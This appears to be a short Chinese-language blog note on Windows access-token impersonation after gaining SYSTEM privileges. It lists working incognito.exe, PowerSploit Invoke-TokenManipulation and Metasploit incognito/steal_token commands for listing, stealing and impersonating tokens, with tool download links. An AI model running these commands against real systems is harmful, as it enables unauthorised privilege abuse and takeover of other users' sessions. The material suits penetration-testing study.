唔,笔记,做个总结….

当你提权拿到sys的时候,你想看个administrator屏幕啥的或者以这个权限执行啥啥的时候…(sys运行远控弹回来的是黑屏..)

之前这种我一般是sys弹到msf,迁移进程来降权到administrator执行…..然而…..迁移容易gg(别问为什么,这是个悲伤的事情)

最近刚好在了解假冒令牌..看到了大佬的文章

token

三种方式

1
2
3
Windows(incognito.exe)
Powershell(Invoke-TokenManipulation.ps1)
Metasploit(load incognito或者steal_token)

Windwos:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

1
2
3
incognito.exe list_tokens -u //列出所有token
incognito.exe execute -c "win-xxx\\administrator" cmd.exe
格式:incognito.exe execute [options] <token> <command>

Powershell:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

1
2
3
Invoke-TokenManipulation -Enumerate 或者ShowAll //列出所有token
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system" //提权到system
更多的去看脚本里面的注释....

Metasploit:

incognito

1
2
3
4
load incognito 加载incognito
list_tokens -u 列出所有token
impersonate_token "WIN-FV3F5ATOOP6\\Life" 这里是需要双斜杠的..
rev2self 或者drop_token 返回之前的token..

steal_token

1
2
3
4
这个是从进程中窃取token
ps
steal_token pid
drop_token